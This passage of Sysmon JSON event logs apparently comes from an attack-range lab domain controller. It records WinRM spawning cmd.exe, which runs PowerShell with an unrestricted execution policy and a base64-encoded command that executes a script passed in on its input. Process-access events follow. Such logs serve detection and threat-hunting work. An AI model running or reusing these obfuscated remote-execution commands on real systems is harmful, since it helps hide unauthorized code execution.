QQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {A837DB8D-030D-5F25-0000-0020B5520600}\r\nLogonId: 0x652B5\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {A837DB8D-030D-5F25-0000-0010EC520600}\r\nParentProcessId: 1324\r\nParentImage: C:\\Windows\\System32\\winrshost.exe\r\nParentCommandLine: C:\\Windows\\system32\\WinrsHost.exe -Embedding","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:13.815","ProcessGuid":"{A837DB8D-030D-5F25-0000-0010BE550600}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"C:\\Windows\\system32\\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{A837DB8D-030D-5F25-0000-0020B5520600}","LogonId":"0x652b5","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{A837DB8D-030D-5F25-0000-0010EC520600}","ParentProcessId":"1324","ParentImage":"C:\\Windows\\System32\\winrshost.exe","ParentCommandLine":"C:\\Windows\\system32\\WinrsHost.exe -Embedding","EventReceivedTime":"2020-08-01 05:52:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4317,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:13.811\r\nSourceProcessGUID: {A837DB8D-030D-5F25-0000-0010EC520600}\r\nSourceProcessId: 1324\r\nSourceThreadId: 4356\r\nSourceImage: C:\\Windows\\system32\\WinrsHost.exe\r\nTargetProcessGUID: {A837DB8D-030D-5F25-0000-0010BE550600}\r\nTargetProcessId: 4980\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\WinrsHost.exe+2c94|C:\\Windows\\system32\\WinrsHost.exe+2eb1|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+7cf9|C:\\Windows\\System32\\combase.dll+1319|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:13.811","SourceProcessGUID":"{A837DB8D-030D-5F25-0000-0010EC520600}","SourceProcessId":"1324","SourceThreadId":"4356","SourceImage":"C:\\Windows\\system32\\WinrsHost.exe","TargetProcessGUID":"{A837DB8D-030D-5F25-0000-0010BE550600}","TargetProcessId":"4980","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\WinrsHost.exe+2c94|C:\\Windows\\system32\\WinrsHost.exe+2eb1|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+7cf9|C:\\Windows\\System32\\combase.dll+1319|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b","EventReceivedTime":"2020-08-01 05:52:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4318,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:13.811\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-030D-5F25-0000-0010BE550600}\r\nTargetProcessId: 4980\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:13.811","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-030D-5F25-0000-0010BE550600}","TargetProcessId":"4980","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:52:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4319,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:13.811\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:13.811","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4320,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:13.811\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:13.811","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4321,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:13.811\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:13.811","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4322,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:13.811\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:13.811","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windo